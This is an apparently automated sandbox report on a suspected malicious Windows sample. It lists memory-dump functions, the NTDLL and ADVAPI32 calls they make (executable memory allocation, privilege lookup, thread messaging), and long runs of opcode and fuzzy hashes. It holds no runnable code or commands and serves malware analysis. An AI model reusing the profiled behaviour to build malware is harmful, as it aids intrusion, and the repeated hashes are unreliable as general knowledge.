Instruction Fuzzy Hash: BAF0B2B6205108AFDB08CF88DC95EEB77AEEF8C314F158249BA0997255C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A4FB Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 9ffc64b18df28b0ef6e7fe51342331a4b0ad2a26d2f95324d3bee179bf33f0a4
Instruction ID: 2ef9bb699a7018c9cc7bc6d29dae641287fc63af95c3dd5d89fb187e99bc2b81
Opcode Fuzzy Hash: 9ffc64b18df28b0ef6e7fe51342331a4b0ad2a26d2f95324d3bee179bf33f0a4
Instruction Fuzzy Hash: 5AF01CB2200108BFDB14DF99DC81EEB77ADEF88354F158249FE0997241C634E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01452B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452B6A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 68abd4e43f35f40b9bf9a0c9ef549d7780a459e84738ae880e48ff5ddcfaded9
Instruction ID: d2ab5cf6babb9ffa6b16833b138d4d651ab981ef890f0227aa643cceed73eda2
Opcode Fuzzy Hash: 68abd4e43f35f40b9bf9a0c9ef549d7780a459e84738ae880e48ff5ddcfaded9
Instruction Fuzzy Hash: 5F9002E12025010341057158441461A410E97F0205B55C022E5014591DC63589916226

Uniqueness

Uniqueness Score: -1.00%

Function 01452BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452BFA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 43408025ec9f67fe79ddbd4ae021fd4803b8f55fdab94c955e0def99aaab4b35
Instruction ID: 60075eef5d1c64529c13ba140d930b41958a9ce812f3b16de652da058fee247f
Opcode Fuzzy Hash: 43408025ec9f67fe79ddbd4ae021fd4803b8f55fdab94c955e0def99aaab4b35
Instruction Fuzzy Hash: AE9002B120150902D1807158440464E010997E1305F95C016A4025655DCB258B5977A2

Uniqueness

Uniqueness Score: -1.00%

Function 01452AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452ADA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5a58e0f9017568956423b5e2e51bb221d1a2918812405a386025b56dcaa2dbab
Instruction ID: 983b74d2ca94cb6b59fbc0834b7fefc333f8f7d4c0e13f0ebcfb1c89d0cee6d8
Opcode Fuzzy Hash: 5a58e0f9017568956423b5e2e51bb221d1a2918812405a386025b56dcaa2dbab
Instruction Fuzzy Hash: 239002A5211501030105B558070450B014A97E5355355C022F5015551CD73189615222

Uniqueness

Uniqueness Score: -1.00%

Function 01452D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452D1A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 51b2943944a4c23ea4b351c00350920df82e31b9c599737c90af1cc27d82e471
Instruction ID: a7c9ba97737ce9c5359a4082fde949b9674cb49a442d1e5cd0dfbb3f64f8a805
Opcode Fuzzy Hash: 51b2943944a4c23ea4b351c00350920df82e31b9c599737c90af1cc27d82e471
Instruction Fuzzy Hash: AF9002A921350102D1807158540860E010997E1206F95D416A4015559CCA2589695322

Uniqueness

Uniqueness Score: -1.00%

Function 01452D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452D3A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed3b3d972b51d557131e837271818922399800dfaa3d69dd054e03518d34e499
Instruction ID: 8d3a5677c341edd2e566573d4d8add4c1cb3e6e16a8bdb311be6e7d2f8aeb29b
Opcode Fuzzy Hash: ed3b3d972b51d557131e837271818922399800dfaa3d69dd054e03518d34e499
Instruction Fuzzy Hash: 529002A130150103D1407158541860A4109E7F1305F55D012E4414555CDA2589565323

Uniqueness

Uniqueness Score: -1.00%

Function 01452DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452DDA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a83404722ec31f56c5662d8cb8723fbcf611c5317db691ec3d4a903b7b52a7e
Instruction ID: 4aa38aab5e9490b283b8a7e108762c197bd84a1b685327136fe6f039bd5ac4bf
Opcode Fuzzy Hash: 2a83404722ec31f56c5662d8cb8723fbcf611c5317db691ec3d4a903b7b52a7e
Instruction Fuzzy Hash: 5E9002A1242542525545B158440450B410AA7F0245795C013A5414951CC6369956D722

Uniqueness

Uniqueness Score: -1.00%

Function 01452DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452DFA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
Instruction ID: c8116c9872de0c67db5ad6d0c23528e9601cf2ebf2d3c05170d94e840a021bbb
Opcode Fuzzy Hash: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
Instruction Fuzzy Hash: 019002B120150513D1117158450470B010D97E0245F95C413A4424559DD7668A52A222

Uniqueness

Uniqueness Score: -1.00%

Function 01452C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452C7A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ceb69aaae140e2809fe2663593214f9ff053ccae63032c50a613b7a2829541ad
Instruction ID: 095143e3fa11c534623ab14ab6db07b929459e1d01504fb7537e139426605543
Opcode Fuzzy Hash: ceb69aaae140e2809fe2663593214f9ff053ccae63032c50a613b7a2829541ad
Instruction Fuzzy Hash: 909002B120158902D1107158840474E010997E0305F59C412A8424659DC7A589917222

Uniqueness

Uniqueness Score: -1.00%

Function 01452CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452CAA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ef2ffee506b5d79f6e03e1ee4df1cc8cb61bd157fb6ffda33e56cf54298fecb7
Instruction ID: 225a0088e3fbf3017018ce149ca52a8a755e0cf64bf1943a35852d0bfd79b501
Opcode Fuzzy Hash: ef2ffee506b5d79f6e03e1ee4df1cc8cb61bd157fb6ffda33e56cf54298fecb7
Instruction Fuzzy Hash: D79002B120150502D1007598540864A010997F0305F55D012A9024556EC77589916232

Uniqueness

Uniqueness Score: -1.00%

Function 01452F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452F3A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dedbe1964203dc16ad13de525c74b5c9c5d29691658b0a41dc700161879e7c7e
Instruction ID: 575254d35fefd43d6f54a91f3d009e682256137436837263f8629a43da88be2b
Opcode Fuzzy Hash: dedbe1964203dc16ad13de525c74b5c9c5d29691658b0a41dc700161879e7c7e
Instruction Fuzzy Hash: DA9002E134150542D10071584414B0A0109D7F1305F55C016E5064555DC729CD526227

Uniqueness

Uniqueness Score: -1.00%

Function 01452FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452FEA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 283bb0177a72f232ab87764f68277d89f2cd8e83e0965ae6e4539dbb704c61dc
Instruction ID: 45cee733211ca394137505d45d3676e4333030dba30ef93d6e8c96b46546a7b1
Opcode Fuzzy Hash: 283bb0177a72f232ab87764f68277d89f2cd8e83e0965ae6e4539dbb704c61dc
Instruction Fuzzy Hash: 399002A1211D0142D20075684C14B0B010997E0307F55C116A4154555CCA2589615622

Uniqueness

Uniqueness Score: -1.00%

Function 01452F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452F9A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 98618b6ed320a4ec38c5b0aa8bf27af41aa4d73d21bc38a6ce110200a3c49cbd
Instruction ID: d654b51234b5230ce7814a2c044284e5a0fb902d1e1f298268d372c9ffab73eb
Opcode Fuzzy Hash: 98618b6ed320a4ec38c5b0aa8bf27af41aa4d73d21bc38a6ce110200a3c49cbd
Instruction Fuzzy Hash: 649002B120190502D1007158481470F010997E0306F55C012A5164556DC73589516672

Uniqueness

Uniqueness Score: -1.00%

Function 01452FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452FBA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 171b0d9b960d01de78ba5a23298ea3520a5ed14a83af76bd68ba7b005bd1d72e
Instruction ID: 944b2d35ca55f4a97c02bf74ce477a499c1029ed79882186760641d42dc5d15d
Opcode Fuzzy Hash: 171b0d9b960d01de78ba5a23298ea3520a5ed14a83af76bd68ba7b005bd1d72e
Instruction Fuzzy Hash: 519002A16015014241407168884490A4109BBF1215755C122A4998551DC66989655766

Uniqueness

Uniqueness Score: -1.00%

Function 01452E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452E8A

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: deb15c1dd8d82109118d8d1b6d8d6258bb7f5590c99ffae769fd6684a7e3765c
Instruction ID: 725924024a19bdacba00d78d0b971976b1f2510431ea93c62c24361895b92692
Opcode Fuzzy Hash: deb15c1dd8d82109118d8d1b6d8d6258bb7f5590c99ffae769fd6684a7e3765c
Instruction Fuzzy Hash: 7D9002A160150602D1017158440461A010E97E0245F95C023A5024556ECB358A92A232

Uniqueness

Uniqueness Score: -1.00%

Function 01452EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452EAA

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 836b37daa4e40278ffd2b64c6f7f3dc715531c8f2cd4be18ab680e21cb883ef4
Instruction ID: 4d27b645369acc53c8acd02fea097b0b8e8c0bdd9f3e8d04d3fb2f4f715cc752
Opcode Fuzzy Hash: 836b37daa4e40278ffd2b64c6f7f3dc715531c8f2cd4be18ab680e21cb883ef4
Instruction Fuzzy Hash: 6E9002F120150502D1407158440474A010997E0305F55C012A9064555EC7698ED56766

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
Opcode Fuzzy Hash: 853c01b66d24f589df6b89bde03758f04558a5ab365de05a0f584bb7a63a4c44
Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A622 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D
RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D

Strings

&EA, xrefs: 0041A612, 0041A61C

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID: &EA
API String ID: 2488874121-1330915590
Opcode ID: 4f5adb6c090d9f761aca899f227854bbc978f19403b4f5599b7088d3ffef287d
Instruction ID: b25da64d1c7be17a64bc07fb75e183af267272aa4b857870772045b2d45b8ee9
Opcode Fuzzy Hash: 4f5adb6c090d9f761aca899f227854bbc978f19403b4f5599b7088d3ffef287d
Instruction Fuzzy Hash: D9018BB52012146FCB20EF65DC44DEB776CEF84328B05865AF94957282C634EC61CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D

Strings

&EA, xrefs: 0041A612, 0041A61C

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0040839C Relevance: 1.7, APIs: 1, Instructions: 183
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0d367043abb203b0db15c80fa1710186e02a9d286bca5a094bc596f62b81abf
Instruction ID: c642f279ee01c55a5a82685bb0bf4c09ec21e604d3ff80a8152a40c77f4ed0a4
Opcode Fuzzy Hash: b0d367043abb203b0db15c80fa1710186e02a9d286bca5a094bc596f62b81abf
Instruction Fuzzy Hash: FC61E7B0900309AFDB24DF64DD85FEB77E8EB48704F00057EF949A7281EB7469418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040830B Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 00d06d75f3fe86fd0c343dff79e9371933e1209f67ba1a258de8278e0a701324
Instruction ID: 642eaaa3ea69e9df636b6cfdd2fbfc5a9ef5043a268ced20851569b5d2e52d39
Opcode Fuzzy Hash: 00d06d75f3fe86fd0c343dff79e9371933e1209f67ba1a258de8278e0a701324
Instruction Fuzzy Hash: 5C01D871A8031877E720A6958C43FFE772C6B40B54F04411EFF04BA1C1D6F8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
Instruction ID: a0f03ca10d03d1d5c38d3c187be8154ddc7636efa3ebbcfd239e67dddfad06e3
Opcode Fuzzy Hash: 6793861beeebbadff428f1e0055fcae04fb265a346085d9c044c4ec0df2940a0
Instruction Fuzzy Hash: B4018471A8032877E720A6959C43FFE776C6B40B54F05012AFF04BA1C1E6A8690546EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A782 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 064dabb3c5514f70655747349a56461b80c7b87b22f434a6884cb0fc95efc62c
Instruction ID: d2b59b103d22d13b5f580e1d9e742f69d860d928bdf5620435659320132029ff
Opcode Fuzzy Hash: 064dabb3c5514f70655747349a56461b80c7b87b22f434a6884cb0fc95efc62c
Instruction Fuzzy Hash: 76E065B5200204AFDB20DF65CC80EDB37A9AF85354F158159F949AB691D530A8158BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A790 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7C0

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b8658252b81b08ed33e4a874e4d8f80b0614426e32f2ee3a7d9107b08e04f012
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 9EE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934E8118BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A698

Memory Dump Source

Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 94fb8da58e6992106aa2b0ab061ea4c6965e877b66759b154152d16d38dd5c99
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: B9D017726002187BD620EB99DC85FD777ACDF487A4F0180AABA1C6B242C531FA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 01452C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01452C24

Memory Dump Source

Source File: 00000002.00000002.1701034461.00000000013E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_13e0000_881SP1exr1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
Instruction ID: 50992192b305ff3528651dfe7f87b06346117b078d8ee56506c7cd7c8e7fe88f
Opcode Fuzzy Hash: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
Instruction Fuzzy Hash: CAB09BB19015C5C5DB52E7644608B1B7A0477D0705F15C063D7030653F4778C1D1E276

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01492349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

MinimumStackCommitInBytes, xrefs: 01492BB0
TracingFlags, xrefs: 01492549
GlobalFlag2, xrefs: 01492FC0
LdrpInitializeExecutionOptions, xrefs: 0149317D
CFGOptions, xrefs: 01492967
RaiseExceptionOnPossibleDeadlock, xrefs: 01492579
@, xrefs: 01492942
DisableHeapLookaside, xrefs: 0149246D
@, xrefs: 01492B74
DisableExceptionChainValidation, xrefs: 0149275F
MaxLoaderThreads, xrefs: 014924EC
ExecuteOptions, xrefs: 014925A0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01493176
